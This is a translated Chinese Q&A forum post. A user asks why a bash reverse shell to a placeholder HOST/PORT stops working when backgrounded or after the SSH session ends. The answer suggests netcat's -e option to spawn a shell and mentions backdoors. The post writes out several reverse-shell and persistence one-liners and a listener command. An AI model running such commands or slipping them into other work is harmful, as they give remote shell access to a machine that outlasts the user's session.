我想bash -i >& /dev/tcp/HOST/PORT 0>&1在 server1 的后台运行。我想监听连接并将命令发送回HOST/PORT。因此,tcpdump 还不够。
我尝试在后台运行它:
bash -i >& /dev/tcp/HOST/PORT 0>&1 &和nohup bash -i >& /dev/tcp/HOST/PORT 0>&1 & disown
但上面的命令似乎不起作用。我也尝试过,
bg bash -i >& /dev/tcp/HOST/PORT 0>&1
它也不起作用。
两者都不允许我在使用时正确连接到 server1 nc -l -vv -p PORT。
当我刚刚运行时它确实有效bash -i >& /dev/tcp/HOST/PORT 0>&1,但是当我断开 SSH 连接时,它会关闭这个特定的连接,并且它也不允许我在此命令之后输入新命令。
答案1
我相当确定你的问题是-interactive操作数需要一个终端,并且后台进程会切断其stdin/stdout。考虑使用nc ... -e连接时调用 shell。那里的链接有一个方便的小netcatpdf 备忘单。为了-e看后门。你可能需要一个 GNU 版本nc使用它 - 否则你会想要重新编译。